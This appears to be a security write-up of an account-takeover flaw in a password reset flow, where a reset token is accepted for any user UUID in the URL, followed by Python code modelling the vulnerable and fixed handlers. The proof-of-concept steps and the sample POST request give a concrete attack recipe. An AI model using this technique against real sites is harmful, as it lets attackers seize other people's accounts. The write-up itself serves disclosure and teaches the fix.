Theoretically Possible To Practical Account Takeover

POC

  1. Created two accounts with email and noted the primary key of both accounts, which was a UUID.
  2. Went to the reset password function, entered the email id and got the reset password link, which looked like this:

     https://domain.tld/changePassword/{user-primary-key-id}/{reset-token}

  3. Replaced the attacker's UUID in that link with the victim's UUID while keeping the attacker's own reset token:

     https://domain.tld/changePassword/{victim-primary-key-id}/{attacker-reset-token}

  4. Submitted a new password against the modified URL:

     POST /changePassword/62c4ffb0-be57-11e8-a68e-8d01686939c8/378fce7754fcdadebb6de5d778753c9916ffed192c942756b45bfeabd4e856f00799a6db002a292eb5cfe007208cc7b1 HTTP/1.1

     {"password":"urhacked"}

     The server validated the token but never checked that it had been issued for the UUID in the path, so the victim's password was changed with the attacker's token.

  5. The only other thing the attack needs is the victim's UUID, and it was obtainable from these links (see victim UUID):

     https://domain.tld/?source=4vyryrtfhf
     https://domain.tld/fast/4vyryrtfhf
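To make the defect concrete, here is an added example (my own code, not the vulnerable site's and not from the original post) modelling the reset endpoint in Python with in-memory stores. The vulnerable handler does what the POC implies: it checks that the token exists and is fresh, then updates whatever account the URL names. The fixed handler binds the token to the account it was issued for, makes it single-use and time-limited. The victim UUID is the one from the POST above; the attacker UUID, the e-mail addresses, the store layout and the token TTL are assumptions.

```python
import hashlib
import hmac
import os
import secrets
import time

# Constructed in-memory stores standing in for the application's database.
# VICTIM_ID is the UUID from the POC; ATTACKER_ID is made up for this example.
VICTIM_ID = "62c4ffb0-be57-11e8-a68e-8d01686939c8"
ATTACKER_ID = "0f9d7c4e-5b1a-4e6d-9a2b-3c4d5e6f7a8b"
USERS = {
    VICTIM_ID: {"email": "victim@example.com", "pw_hash": None},
    ATTACKER_ID: {"email": "attacker@example.com", "pw_hash": None},
}
RESET_TOKENS = {}  # token -> {"user_id": ..., "expires": ..., "used": ...}


def hash_password(password: str) -> bytes:
    salt = os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def verify_password(password: str, stored: bytes) -> bool:
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, digest)


def request_reset(email: str, ttl_seconds: int = 900) -> str:
    """Issue a reset token; the server records which account it was issued for."""
    user_id = next(uid for uid, u in USERS.items() if u["email"] == email)
    token = secrets.token_hex(48)  # 96 hex chars, the same shape as the token in the POC
    RESET_TOKENS[token] = {"user_id": user_id, "expires": time.time() + ttl_seconds, "used": False}
    return token


def change_password_vulnerable(url_user_id: str, token: str, new_password: str) -> bool:
    """Handler for /changePassword/{id}/{token} as the POC implies it behaved:
    the token is checked for existence and freshness, but the account to update
    is taken from the URL, so any valid token works against any UUID."""
    rec = RESET_TOKENS.get(token)
    if rec is None or rec["expires"] < time.time():
        return False
    USERS[url_user_id]["pw_hash"] = hash_password(new_password)
    return True


def change_password_fixed(url_user_id: str, token: str, new_password: str) -> bool:
    """Hardened handler: the token must be unused, unexpired and bound to the
    very UUID in the URL; it is then consumed so the link cannot be replayed."""
    rec = RESET_TOKENS.get(token)
    if rec is None or rec["used"] or rec["expires"] < time.time():
        return False
    # Constant-time comparison on bytes (compare_digest rejects non-ASCII str input).
    if not hmac.compare_digest(rec["user_id"].encode(), url_user_id.encode()):
        return False
    rec["used"] = True
    USERS[url_user_id]["pw_hash"] = hash_password(new_password)
    return True


def run_attack(handler) -> bool:
    """Replay the POC: attacker's own token, victim's UUID in the path.
    Returns True if the victim's password became "urhacked"."""
    USERS[VICTIM_ID]["pw_hash"] = hash_password("victim-original")
    attacker_token = request_reset("attacker@example.com")
    handler(VICTIM_ID, attacker_token, "urhacked")
    return verify_password("urhacked", USERS[VICTIM_ID]["pw_hash"])


def legitimate_reset(handler) -> tuple:
    """The victim resets their own password, then the same link is replayed.
    Returns (first_attempt_ok, replay_ok)."""
    token = request_reset("victim@example.com")
    first = handler(VICTIM_ID, token, "fresh-password")
    replay = handler(VICTIM_ID, token, "replayed-password")
    return first, replay


if __name__ == "__main__":
    print("vulnerable handler, attacker token vs victim id:", run_attack(change_password_vulnerable))
    print("fixed handler, attacker token vs victim id:    ", run_attack(change_password_fixed))
    print("fixed handler, legitimate reset then replay:  ", legitimate_reset(change_password_fixed))
```

The attack succeeds against the vulnerable handler and fails against the fixed one, while a legitimate reset still works exactly once. Note that the fix does not need to drop the UUID from the URL at all; it only has to refuse a token that was not issued for that UUID. In a real deployment the token should also be stored hashed, so that a database read does not hand out usable reset links.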
